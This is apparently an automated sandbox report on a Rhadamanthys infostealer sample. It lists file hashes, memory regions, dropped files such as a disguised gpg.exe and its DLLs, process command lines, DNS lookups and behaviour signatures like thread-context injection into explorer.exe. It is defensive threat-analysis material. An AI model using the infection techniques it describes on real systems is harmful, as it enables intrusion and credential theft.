| SHA512 | b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf |
memory/1072-49-0x0000000003240000-0x0000000003276000-memory.dmp
memory/1072-50-0x0000000072750000-0x0000000072F00000-memory.dmp
memory/1072-51-0x00000000031E0000-0x00000000031F0000-memory.dmp
memory/1072-52-0x0000000005980000-0x0000000005FA8000-memory.dmp
memory/1072-53-0x0000000005950000-0x0000000005972000-memory.dmp
memory/1072-54-0x0000000006120000-0x0000000006186000-memory.dmp
memory/1072-60-0x0000000006190000-0x00000000061F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pb0fyn2n.ezv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1072-65-0x0000000006300000-0x0000000006654000-memory.dmp
memory/1072-66-0x0000000006820000-0x000000000683E000-memory.dmp
memory/1072-67-0x0000000006850000-0x000000000689C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pssDAB9.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
memory/1072-69-0x0000000008180000-0x00000000087FA000-memory.dmp
memory/1072-70-0x0000000006D80000-0x0000000006D9A000-memory.dmp
memory/1072-71-0x0000000007B00000-0x0000000007B96000-memory.dmp
memory/1072-72-0x0000000006E10000-0x0000000006E32000-memory.dmp
memory/1072-73-0x0000000008800000-0x0000000008DA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scrDAB7.ps1
| MD5 | 753240f3d0c58563dcba1244db69b0d7 |
| SHA1 | 4a0f248fccc2431ece50f717cbf80f6681504932 |
| SHA256 | e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a |
| SHA512 | 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9 |
memory/1072-75-0x0000000008DB0000-0x0000000008F72000-memory.dmp
memory/1072-76-0x00000000094B0000-0x00000000099DC000-memory.dmp
memory/1072-80-0x0000000072750000-0x0000000072F00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msiDAB6.txt
| MD5 | eb0046beb949b23b97dccd59c4b8f131 |
| SHA1 | c084a9c15a323cd51d24122681a494e52577487f |
| SHA256 | b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467 |
| SHA512 | 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0 |
C:\Config.Msi\e59d6e1.rbs
| MD5 | d178d65fab62e109b9297ffe481924d0 |
| SHA1 | e8d77c1f8159fec32502744383e2ccdd9eb00041 |
| SHA256 | 6f71db2358e917554552dc1eda451a37afa26b401617be4b8faea4a61249ad26 |
| SHA512 | 81d66a1a3deca273a0fb9851c4cd4586d6388f628d56f483e4753c13922a8ed498c5930eecc48ea128fc20a6131639f5edd61ecd854439aeb9e9b73e2902f9f6 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
| MD5 | 35365d3713500bde4e2e1422c54f04fa |
| SHA1 | 0b24b1de060caa7be51404d82da5fef05958a1da |
| SHA256 | 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19 |
| SHA512 | 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375 |
C:\Windows\Installer\e59d6de.msi
| MD5 | 91b9983492862e7d6b6f695d48b64a4e |
| SHA1 | af03bcecd1af49ab3ccf61f79f58fc690d29796b |
| SHA256 | 800fea008bf2733b336f02d6312a51169c9e7d30f1fd78193ddd56fd41d51e3e |
| SHA512 | 006c1d443419f9fe3eab966f28a1fea6b30dbb98379eb08d67240c821c9310129a63c29312081d70d2e0eaecc26cde6e95afe5be9cf4cb3ad8241cfc76437694 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll
| MD5 | a2dd12a8ecef27ca0e524e9bb4bdb8f5 |
| SHA1 | a4f5718c8bc1cc1fba49332d767ad296f7156dbc |
| SHA256 | e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada |
| SHA512 | b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll
| MD5 | f87ae9852d35b780aeedde438c892b33 |
| SHA1 | 1e619647f3153d42852ee4692402ea7482a4b0d0 |
| SHA256 | f8c672bb71967f5792b62135caad7a5dc7b1c5fc2a7b4875d37e646014a9c65d |
| SHA512 | 6ec3ec5160bbb96ed7743c4a965f5c98edd51ee0bf42d08ce10902eb75db14e0a3ab09e2175580fd0cea0425e30e000e320d4d4ff0b9a90141efe5fe8c166227 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll
| MD5 | 8f4cdaed2399204619310cd76fd11056 |
| SHA1 | 0f06ef5acde4f1e99a12cfc8489c1163dba910d1 |
| SHA256 | df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213 |
| SHA512 | 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc |
memory/4500-175-0x00000000008B0000-0x00000000008B1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll
| MD5 | b9d7a09c63378aea52a04c42d9893a6e |
| SHA1 | 8d10526730d5be4f6adfccf370546cfdde9af7b1 |
| SHA256 | 0930ceebc768d160e1d4c857c3f4113e8b3ebcb5bdce4a5232471c90effe8158 |
| SHA512 | d4808d041c4d880e10220fd60751cfec336f185396a49efec4c1f9bc7f9ebf8e5db975304f6cce8aee7d8e130dfb8489e2f11600c6ac4f990ee3705462940558 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll
| MD5 | f6e0a5fd71de78ba3d635e59fa0b5471 |
| SHA1 | 8ffe9980af53668c08a07ff7de1e7dee0749d6a4 |
| SHA256 | 1515801cee7233cb07b7a411586797b68721bdfa1ecbc5a6b9e137045d080e50 |
| SHA512 | c055654cf580fff3cbd715eee93cd0d2546dffbb338e607795e52286329e661c952c6a8cd52b5a44136cd8cb2fd2be2d98f2fad437432bb915f5fbdd11841a20 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll
| MD5 | 50ce7d881dd88eb9728fa9225f3fa938 |
| SHA1 | 616242e243fe334fd997832fd002f331fb1949be |
| SHA256 | cc2b0805db0ef162c8aadfa2e9611507c994edd2394a618dd9c938cfb902c9e7 |
| SHA512 | eca00bd0a5c31d862a681c5219cac9d2c6e2193a39d11dbc2a3c5002c63965e4e65d08bda26c042176bc1074887beb86a65f3b795aa0a89e124dad14e1d00033 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll
| MD5 | b7b148054a2818699d93f96139b4d0d0 |
| SHA1 | 0a5187b37bd84c19a7d2d84f328fa0adbc75123c |
| SHA256 | 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915 |
| SHA512 | 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll
| MD5 | 72498f59c8c580707a0a3839c332f51b |
| SHA1 | fb09b912912610d243066cc8b71435f689e6a449 |
| SHA256 | 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d |
| SHA512 | 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022 |
memory/4500-177-0x00000000008E0000-0x0000000000905000-memory.dmp
memory/4860-179-0x0000000000B30000-0x0000000000B58000-memory.dmp
memory/4500-181-0x0000000000400000-0x000000000054C000-memory.dmp
memory/4860-182-0x0000000000B30000-0x0000000000B58000-memory.dmp
memory/4860-180-0x0000000000B30000-0x0000000000B58000-memory.dmp
memory/4500-183-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/4860-185-0x0000000000B30000-0x0000000000B58000-memory.dmp
memory/4500-184-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/4500-186-0x000000006A800000-0x000000006A80F000-memory.dmp
memory/4500-187-0x0000000066580000-0x00000000666AA000-memory.dmp
memory/4500-188-0x0000000063080000-0x00000000630A9000-memory.dmp
memory/2100-198-0x00000195B8A50000-0x00000195B8A72000-memory.dmp
memory/2100-202-0x00007FFA27A60000-0x00007FFA28521000-memory.dmp
memory/2100-203-0x00000195B8530000-0x00000195B8540000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2c1d2cfc324253fe48c917f3a3b37bf |
| SHA1 | 84d6a497073050df2d8482b557135aacd8649284 |
| SHA256 | 75236f965ddb47c26329ac89d4459e2d8f013f3e6e2b73bf02f7405232f6b5db |
| SHA512 | 238b32897c17bf8cfc58640e3f4a26c689a757e4d9d6f41e083f41100b785a6918252876a12d62d24c8a5bd25ca090c92682072b0764ff68a7e7a95fc7f4c524 |
memory/2100-212-0x00000195D0EC0000-0x00000195D0EDC000-memory.dmp
memory/2100-213-0x00000195B8530000-0x00000195B8540000-memory.dmp
memory/2100-238-0x00000195D1520000-0x00000195D16E2000-memory.dmp
memory/2100-239-0x00000195D1C20000-0x00000195D2148000-memory.dmp
memory/2100-245-0x00007FFA27A60000-0x00007FFA28521000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe
| MD5 | a9c5924063a253f64fb86bc924be6996 |
| SHA1 | c39ba1e011318b3edf295d4bdde3d56b5de89972 |
| SHA256 | eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4 |
| SHA512 | 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e |
C:\Config.Msi\e59d6e5.rbs
| MD5 | b875ceae19b80e8ec3e6c92509595d8b |
| SHA1 | 3fec9e1c06fbf046f9c77adabfb8066604f46c95 |
| SHA256 | 3c20193a0f2a5873e79cdea6bef6cb2940849336019cd45a902f52a7ae35e0e0 |
| SHA512 | 23651e7c645065b7c94c67cbe845347a0e8e3c82ac09be31c44d69d335b4ad12e45ffec5c3041dc8216b060a798065047b275c1eca34117ecc36722a5592d1ce |
memory/4860-302-0x0000000000B30000-0x0000000000B58000-memory.dmp
memory/4860-303-0x0000000000E10000-0x0000000000F10000-memory.dmp
memory/4860-304-0x00000000040B0000-0x0000000004138000-memory.dmp
memory/4860-305-0x0000000005280000-0x0000000005680000-memory.dmp
memory/4860-307-0x0000000005280000-0x0000000005680000-memory.dmp
memory/4860-309-0x0000000005280000-0x0000000005680000-memory.dmp
memory/4860-308-0x00007FFA49B70000-0x00007FFA49D65000-memory.dmp
memory/4860-311-0x00000000761C0000-0x00000000763D5000-memory.dmp
memory/3280-312-0x0000000000550000-0x0000000000559000-memory.dmp
memory/3280-314-0x00000000024A0000-0x00000000028A0000-memory.dmp
memory/3280-315-0x00000000024A0000-0x00000000028A0000-memory.dmp
memory/3280-316-0x00007FFA49B70000-0x00007FFA49D65000-memory.dmp
memory/3280-319-0x00000000024A0000-0x00000000028A0000-memory.dmp
memory/3280-318-0x00000000761C0000-0x00000000763D5000-memory.dmp
memory/3280-320-0x00000000024A0000-0x00000000028A0000-memory.dmp
memory/4860-321-0x0000000000C10000-0x0000000000C20000-memory.dmp
memory/4860-323-0x00000000040B0000-0x0000000004138000-memory.dmp
memory/4860-324-0x0000000005280000-0x0000000005680000-memory.dmp
C:\Config.Msi\e59d6e8.rbs
| MD5 | 089b2892de707d97266679cb8605ac46 |
| SHA1 | 7669e0a4d522059a4a55f33a65a767cda8307217 |
| SHA256 | 545ab7b7ac37eb01c11fc7ff30c35156fc217d0566318535972c318e2fe71c02 |
| SHA512 | 99ce25b570da01a12a7418d849ae795373017e1b8c112659d657ec84e12f738fa5e60861affeccb927024551a3b801a0267999def4f39e18630050eecd434099 |
C:\Config.Msi\e59d6eb.rbs
| MD5 | 61a47a3c255928cc7b27fc678993648b |
| SHA1 | 2f7af2b373870b16e0907934a7ee84f27c99535e |
| SHA256 | 0e4d5b95ff605db334ca7c4cee4634490e7219c3c3c0480835765cf0e5a773a0 |
| SHA512 | ea28e2a7d020f4fe232b37848399a1c2c0cb486eb39bf92b9a75ad67001a36b14b17cc940ba314fbed6f6e81ef157faaf5ebd4454fa1dd3acf27e4d659cf173d |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-27 16:03
Reported
2024-03-27 16:14
Platform
win10v2004-20240226-en
Max time kernel
570s
Max time network
454s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\password.jpg
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.225.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.177.78.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
Files
memory/904-0-0x0000021066D40000-0x0000021066D50000-memory.dmp
memory/904-16-0x0000021066E40000-0x0000021066E50000-memory.dmp
memory/904-32-0x000002106F420000-0x000002106F421000-memory.dmp
memory/904-33-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-34-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-35-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-36-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-37-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-38-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-39-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-40-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-41-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-42-0x000002106F440000-0x000002106F441000-memory.dmp
memory/904-43-0x000002106F070000-0x000002106F071000-memory.dmp
memory/904-44-0x000002106F060000-0x000002106F061000-memory.dmp
memory/904-46-0x000002106F070000-0x000002106F071000-memory.dmp
memory/904-49-0x000002106F060000-0x000002106F061000-memory.dmp
memory/904-52-0x000002106EFA0000-0x000002106EFA1000-memory.dmp
memory/904-66-0x000002106F1B0000-0x000002106F1B1000-memory.dmp
memory/904-64-0x000002106F1A0000-0x000002106F1A1000-memory.dmp
memory/904-67-0x000002106F1B0000-0x000002106F1B1000-memory.dmp
memory/904-68-0x000002106F2C0000-0x000002106F2C1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-27 16:03
Reported
2024-03-27 16:14
Platform
win10v2004-20240226-en
Max time kernel
456s
Max time network
457s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2832 created 2520 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3728 set thread context of 2832 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI5CB1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6B39.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI979B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9A1F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5959bf.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5BA4.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI97CB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5A1C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5C62.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5D00.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5959c3.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI98D6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5959bf.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5C03.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{0A6C4E0B-599B-45A1-852F-9E5AF85901A1} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI970D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI981A.tmp | C:\Windows\system32\msiexec.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
